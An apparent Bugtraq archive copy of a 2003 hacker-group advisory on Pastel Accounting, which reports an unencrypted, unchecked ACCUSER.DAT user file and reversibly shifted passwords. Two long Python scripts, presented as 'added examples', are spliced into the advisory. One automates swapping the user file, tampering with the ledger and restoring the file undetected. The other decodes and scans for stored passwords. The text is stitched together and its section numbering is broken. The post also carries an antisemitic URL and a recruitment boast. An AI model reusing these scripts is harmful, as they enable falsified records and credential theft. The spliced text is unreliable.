Bugtraq mailing list archives

[blaqhatz] - Pastel Accounting application security issues
From: "l33t guy" <blaqhatz () webmail co za>
Date: Mon, 3 Mar 2003 17:43:11 +0200

See attached.

Hash: SH1T


blaqhatz! () #!@%! () #! ADVISORY blaqhatz! () #!@%! () #!

blaqhatz advisory #1
date: third day of march, in the year of our lord
 two thousand and three (03/03/03)
why today? coz we love 303, oh! oh! oh! http://www.only4jewz.net/efil4zaggin/blaqhatz.advisory.20030303

l                                                                          l
a      ,-.        ||||||  ||     //\\   /|||\  ||  ||  //\\ |||||| |||||/  a
q     /`-'\       ||   )) ||    //  \\ ||   || ||  || //  \\  ||      //   q
|  .-/     \-,    ||||<<  ||    /||||\ ||   || |||||| /||||\  ||     //    |
b (  `.___.'  )   ||   )) ||    ||  || ||   || ||  || ||  ||  ||    //     b
l  `. _____ .'    ||||||  ||||| ||  ||  \|||\\ ||  || ||  ||  ||   /|||||  l
a                                            \\                            a 

PRODUCT: PASTEL ACCOUNTING v6.0-6.12 (confirmed)
         earlier versions (suspected)


Pastel Accounting is an accounting package widely used by small business entities in countries in Africa, Europe, the 
Middle and Far East and Australasia. The Pastel product includes a facility for secure access to specific modules 
within the product.

Further information is available @ http://www.pastel.com


The security system and application controls used by the Pastel product are broken.

All user and security information is stored in the file "ACCUSER.DAT" inside the chosen client folder. Nothing in this 
file is encrypted, and the application performs no version or integrity check on it before trusting its contents.

As such, it is possible to replace the ACCUSER.DAT file with one taken from a different set of accounts, whose usernames 
and passwords are known, log in with those credentials, access and modify the data stored in the target set of accounts, 
and then restore the original file. The application is left with no concrete record of who modified the data.

In some contexts it would even be possible to falsify records in an attempt to 'frame' a particular user with the 
changes, since the application attributes them to whichever account was logged in at the time.
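The swap-and-restore sequence above, as an added example that is not code from the advisory or from Pastel. It builds a constructed client folder in a temporary directory (the file name ACCUSER.DAT is from the advisory; its contents, the LEDGER.DAT stand-in for the books, the accuser.bak name and the credential strings are made up here), runs the three steps, and then asks what a naive "audit around the application" script that baselines the content hash and mtime of ACCUSER.DAT would see. Writing to the ledger directly stands in for logging into the application with the known credentials and editing the books through it.

```python
"""Swap-and-restore against an unprotected credential file.

Added example; not code from the blaqhatz advisory or from the vendor.
Everything except the name ACCUSER.DAT is constructed for illustration.
"""
import hashlib
import os
import shutil
import tempfile

USER_FILE = "ACCUSER.DAT"
LEDGER_FILE = "LEDGER.DAT"      # hypothetical stand-in for the books

# Constructed contents of a legitimate client folder.
VICTIM_ACCUSER = b"SUPERVISOR:K9x#Qp2z\r\nCLERK:b7Lm!4rs\r\n"
VICTIM_LEDGER = b"INV0001,ACME LTD,1200.00\r\n"
# The attacker's own ACCUSER.DAT, with credentials they already know.
ATTACKER_ACCUSER = b"SUPERVISOR:letmein1\r\n"


def sha256_file(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()


def fingerprint(path):
    """What a naive baseline script records: content hash and mtime."""
    st = os.stat(path)
    return (sha256_file(path), int(st.st_mtime))


def run_attack(client_dir):
    """Swap, tamper, restore.  Returns (fingerprint before, fingerprint
    after, ledger contents after tampering)."""
    target = os.path.join(client_dir, USER_FILE)
    backup = os.path.join(client_dir, "accuser.bak")   # hypothetical name
    before = fingerprint(target)

    # 1. keep the victim's file; copy2 also preserves its mtime
    shutil.copy2(target, backup)

    # 2. drop in a file whose credentials are known (no integrity check
    #    stops the application from accepting it)
    with open(target, "wb") as f:
        f.write(ATTACKER_ACCUSER)

    #    ...log in as SUPERVISOR with the known password and edit the books;
    #    modelled here as a direct append to the ledger file
    with open(os.path.join(client_dir, LEDGER_FILE), "ab") as f:
        f.write(b"INV0002,SHELL CO,99999.00\r\n")

    # 3. put the original back, mtime and all, and remove the trace
    shutil.copy2(backup, target)
    os.remove(backup)

    after = fingerprint(target)
    with open(os.path.join(client_dir, LEDGER_FILE), "rb") as f:
        ledger = f.read()
    return before, after, ledger


def demo():
    """Build the folder, run the attack, and report whether a hash+mtime
    baseline on ACCUSER.DAT would have noticed.  Returns (undetected, ledger)."""
    client_dir = tempfile.mkdtemp(prefix="pastel_client_")
    try:
        with open(os.path.join(client_dir, USER_FILE), "wb") as f:
            f.write(VICTIM_ACCUSER)
        with open(os.path.join(client_dir, LEDGER_FILE), "wb") as f:
            f.write(VICTIM_LEDGER)
        before, after, ledger = run_attack(client_dir)
    finally:
        shutil.rmtree(client_dir)
    return before == after, ledger


if __name__ == "__main__":
    undetected, ledger = demo()
    print("ACCUSER.DAT hash and mtime unchanged after the attack:", undetected)
    print("ledger now contains:", ledger)
```

The point of the run is the `True` on the first line: once the original file is back, a content hash or mtime baseline on ACCUSER.DAT shows nothing, while the ledger carries the forged entry under a legitimate user's name. Auditing around the application therefore has to sit at the operating-system layer, where the write to the file can be denied (restrictive permissions on the client folder) or at least logged (file-access auditing), rather than in any property of the file itself.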

Additionally, some preliminary testing on the ACCUSER.DAT file revealed a direct correlation between certain sections of 
the file and the passwords chosen. For example, given a group of users with the chosen passwords "AAAAAAAA", 
"BBBBBBBB", "CCCCCCCC", "DDDDDDDD" and "ABCDEFGH", the following strings were found in the file: "ssssssss", 
"tttttttt", "uuuuuuuu", "vvvvvvvv" and "stuvwxyz". Each letter of the password is stored as the character 50 positions 
further along the ASCII table (A -> s, B -> t, and so on), at least for the uppercase letters tested, so the stored form 
is a fixed substitution that can be reversed by inspection rather than anything resembling a password hash.
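The known-plaintext check a practitioner would run on those five pairs, as an added example that is not code from the advisory. It derives the offset from the reported data instead of assuming it, and then goes one step beyond the text: a scanner that pulls candidate passwords out of raw file bytes under that offset. The advisory only shows the letters A to H, so treating the transform as a uniform byte shift over all printable ASCII is an assumption of this example, and the sample blob it scans is constructed here, not taken from a real ACCUSER.DAT.

```python
"""Known-plaintext analysis of the ACCUSER.DAT password encoding.

Added example, not code from the blaqhatz advisory or from the vendor.
Only the five OBSERVED pairs come from the advisory; the uniform-shift
hypothesis and SAMPLE_BLOB are assumptions made for illustration.
"""

# Password / stored-string pairs exactly as reported in the advisory.
OBSERVED = [
    ("AAAAAAAA", "ssssssss"),
    ("BBBBBBBB", "tttttttt"),
    ("CCCCCCCC", "uuuuuuuu"),
    ("DDDDDDDD", "vvvvvvvv"),
    ("ABCDEFGH", "stuvwxyz"),
]


def infer_shift(pairs):
    """Return the single byte offset that maps every plaintext character
    to its stored form, or None if no constant offset explains the pairs
    (which would rule out a plain substitution-by-shift)."""
    offsets = set()
    for plain, stored in pairs:
        if len(plain) != len(stored):
            return None
        for p, s in zip(plain, stored):
            offsets.add((ord(s) - ord(p)) % 256)
    return offsets.pop() if len(offsets) == 1 else None


def encode(plain, shift):
    """Stored form of a password under the inferred shift (assumed to
    apply to every byte, not only A..H)."""
    return "".join(chr((ord(c) + shift) % 256) for c in plain)


def decode(stored, shift):
    """Inverse of encode(): recover the password from its stored form."""
    return "".join(chr((ord(c) - shift) % 256) for c in stored)


def find_candidates(blob, shift, min_len=8):
    """Scan raw file bytes for maximal runs that decode to printable ASCII
    under `shift`; runs shorter than min_len are discarded as noise."""
    found, run = [], []
    for b in blob:
        p = (b - shift) % 256
        if 0x20 <= p <= 0x7E:
            run.append(chr(p))
            continue
        if len(run) >= min_len:
            found.append("".join(run))
        run = []
    if len(run) >= min_len:
        found.append("".join(run))
    return found


# Constructed stand-in for a fragment of the file: two encoded passwords
# separated by bytes that fall outside the printable range once shifted,
# plus a two-byte run that the min_len filter should drop.
SHIFT = infer_shift(OBSERVED)
SAMPLE_BLOB = (
    b"\x00\x01"
    + encode("ABCDEFGH", SHIFT).encode("latin-1")
    + b"\x00" + b"ab" + b"\xff"
    + encode("Pa55word", SHIFT).encode("latin-1")
    + b"\xff"
)

if __name__ == "__main__":
    print("inferred shift:", SHIFT)                 # 50
    print("decode('stuvwxyz'):", decode("stuvwxyz", SHIFT))
    print("candidates in blob:", find_candidates(SAMPLE_BLOB, SHIFT))
```

If `infer_shift` ever returned `None` on real samples, the encoding would be something other than a constant shift and the scanner's assumption would not hold; the five pairs in the advisory agree on a single value, which is what makes the stored passwords recoverable with nothing more than this.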


Users cannot rely on the application-level access controls implemented by the Pastel Accounting package.

As no reliance may be placed on application-level controls, auditors must audit around the application: controls on who 
can read or write the client folder, and ACCUSER.DAT in particular, have to come from outside the product.

4. FIX

None as of yet. Vendor notified.

blaqhatz are:

                pheer - pheerless
 - skankyvontrashbag - skankette - nyama_zinto -
 rod-boi - pheered - minibyte - whoot - pofmuis


           !!# () j01N blaqhatz t0D4y!! () #

 mailto:eye.am.leet.eye.swear () blaqhatz za net

telling us who and what you are and with a good reason as to why you think you're leet enough to join blaqhatz

              Why should I join?

1. Everyone else thinks blaqhatz 0wn.
2. blaqhatz have been interviewed by more international legal authorities, seen the inside of more networks and more 
telcos, been on more television shows, been asked to assist more national intelligence agencies and skewled more 
people than any other group. **blaqhatz are *the* authority on modern information security**
3. We're nice people.
4. You can get sekret, blaqhatz warez, for free, just for applying.
5. You value security and 0day. You believe in freedom of information. You believe in helping others help themselves. 
blaqhatz will help you act to make your beliefs a reality.
6. We're only accepting new member applications until the 9th of the 3rd, 2000 & 3, on a first come, first served 
basis. All members will need to be approved by the elite blaqhatz board.

Big ups, shout outs and serious ruspek go to:
~el8, BoW, #havok, phrack.org, kouriers 4 christ, #hack krew, oldskewl efnet #phreakGER, effkay, arclight, maelstrom, 
ganja_man, scavenger, mindbinder, raw liquid, tonedef, y0y0y0 and c0.

r0qin' 1t iN 2w0-d0ubl3-0h-thr33!!! () #

Version: PPP 3.0.3 d34dc0d35f4dd34dc0d35f4dd34dc0d35f4dd34dc0d35f4d
-----END PPP SIGNATURE-----
